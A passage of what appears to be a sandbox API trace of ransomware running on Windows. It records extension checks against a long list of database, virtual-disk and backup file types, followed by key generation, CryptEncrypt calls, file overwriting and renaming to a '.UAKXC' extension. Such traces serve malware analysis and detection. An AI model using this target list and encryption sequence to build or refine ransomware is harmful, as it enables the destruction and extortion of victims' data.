(x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".accdr") returned 0x0 [0140.171] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".accdt") returned 0x0 [0140.171] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".accft") returned 0x0 [0140.171] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".adb") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".ade") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".adf") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".adp") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".arc") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".ora") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".alf") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".ask") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".btr") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".bdf") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".cat") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".cdb") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".ckp") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".cma") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".cpd") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dacpac") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dad") returned 0x0 [0140.172] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dadiagrams") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".daschema") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".db") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".db-shm") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".db-wal") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".db3") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dbc") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dbf") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dbs") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dbt") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dbv") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dbx") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dcb") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dct") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dcx") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".ddl") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dlis") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dp1") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dqy") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dsk") returned 0x0 [0140.173] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dsn") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dtsx") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".dxl") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".eco") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".ecx") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".edb") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".epim") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".exb") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".fcd") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".fdb") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".fic") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".fmp") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".fmp12") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".fmpsl") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".fol") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".fp3") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".fp4") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".fp5") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".fp7") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".fpt") returned 0x0 [0140.174] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".frm") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".gdb") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".grdb") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".gwi") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".hdb") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".his") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".ib") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".idb") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".ihx") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".itdb") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".itw") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".jet") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".jtx") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".kdb") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".kexi") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".kexic") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".kexis") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".lgc") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".lwx") returned 0x0 [0140.175] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".maf") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".maq") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".mar") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".mas") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".mav") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".mdb") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".mdf") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".mpd") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".mrg") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".mud") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".mwb") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".myd") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".ndf") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".nnt") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".nrmlib") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".ns2") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".ns3") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".ns4") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".nsf") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".nv") returned 0x0 [0140.176] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".nv2") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".nwdb") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".nyf") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".odb") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".oqy") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".orx") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".owc") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".p96") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".p97") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".pan") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".pdb") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".pdm") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".pnz") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".qry") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".qvd") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".rbf") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".rctd") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".rod") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".rodx") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".rpd") returned 0x0 [0140.177] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".rsd") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".sas7bdat") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".sbf") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".scx") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".sdb") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".sdc") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".sdf") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".sis") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".spq") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".sql") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".sqlite") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".sqlite3") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".sqlitedb") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".te") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".temx") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".tmd") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".tps") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".trc") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".trm") returned 0x0 [0140.178] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".udb") returned 0x0 [0140.179] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".udl") returned 0x0 [0140.179] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".usr") returned 0x0 [0140.179] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".v12") returned 0x0 [0140.179] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".vis") returned 0x0 [0140.179] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".vpd") returned 0x0 [0140.179] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".vvv") returned 0x0 [0140.179] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".wdb") returned 0x0 [0140.179] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".wmdb") returned 0x0 [0140.179] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".wrk") returned 0x0 [0140.179] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".xdb") returned 0x0 [0140.179] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".xld") returned 0x0 [0140.179] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".xmlff") returned 0x0 [0140.179] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".abcddb") returned 0x0 [0140.179] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".abs") returned 0x0 [0140.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".abx") returned 0x0 [0140.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".accdw") returned 0x0 [0140.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".adn") returned 0x0 [0140.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".db2") returned 0x0 [0140.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".fm5") returned 0x0 [0140.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".hjt") returned 0x0 [0140.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".icg") returned 0x0 [0140.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".icr") returned 0x0 [0140.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".kdb") returned 0x0 [0140.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".lut") returned 0x0 [0140.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".maw") returned 0x0 [0140.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".mdn") returned 0x0 [0140.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".mdt") returned 0x0 [0140.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".vdi") returned 0x0 [0140.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".vhd") returned 0x0 [0140.181] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".vmdk") returned 0x0 [0140.181] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".pvm") returned 0x0 [0140.181] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".vmem") returned 0x0 [0140.181] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".vmsn") returned 0x0 [0140.181] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".vmsd") returned 0x0 [0140.181] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".nvram") returned 0x0 [0140.181] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".vmx") returned 0x0 [0140.181] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".raw") returned 0x0 [0140.181] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".qcow2") returned 0x0 [0140.181] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".subvol") returned 0x0 [0140.181] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".bin") returned 0x0 [0140.181] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".vsv") returned 0x0 [0140.181] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".avhd") returned 0x0 [0140.181] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".vmrs") returned 0x0 [0140.199] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".vhdx") returned 0x0 [0140.199] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".avdx") returned 0x0 [0140.199] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".vmcx") returned 0x0 [0140.199] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpSrch=".iso") returned 0x0 [0140.199] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.199] WriteFile (in: hFile=0x6cc, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.283] WriteFile (in: hFile=0x6cc, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.283] SetEndOfFile (hFile=0x6cc) returned 1 [0140.283] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.283] ReadFile (in: hFile=0x6cc, lpBuffer=0x4100000, nNumberOfBytesToRead=0x89, lpNumberOfBytesRead=0x373fc88, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc88*=0x89, lpOverlapped=0x0) returned 1 [0140.283] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffffff77, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.283] WriteFile (in: hFile=0x6cc, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x89, lpNumberOfBytesWritten=0x373fc44, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc44*=0x89, lpOverlapped=0x0) returned 1 [0140.283] CloseHandle (hObject=0x6cc) returned 1 [0140.287] GetProcessHeap () returned 0xea0000 [0140.287] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef04c8 [0140.287] lstrcpyW (in: lpString1=0xef04c8, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini") returned="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini" [0140.287] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini", lpString2=".UAKXC" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini.UAKXC") returned="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini.UAKXC" [0140.287] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\update-settings.ini"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini.UAKXC" (normalized: "c:\\program files (x86)\\mozilla firefox\\update-settings.ini.uakxc")) returned 1 [0140.288] GetProcessHeap () returned 0xea0000 [0140.288] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef04c8 | out: hHeap=0xea0000) returned 1 [0140.288] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedda98 | out: hHeap=0xea0000) returned 1 [0140.288] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed0d0 | out: hHeap=0xea0000) returned 1 [0140.288] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0140.288] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0140.289] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0140.290] GetFileAttributesW (lpFileName="C:\\Program Files 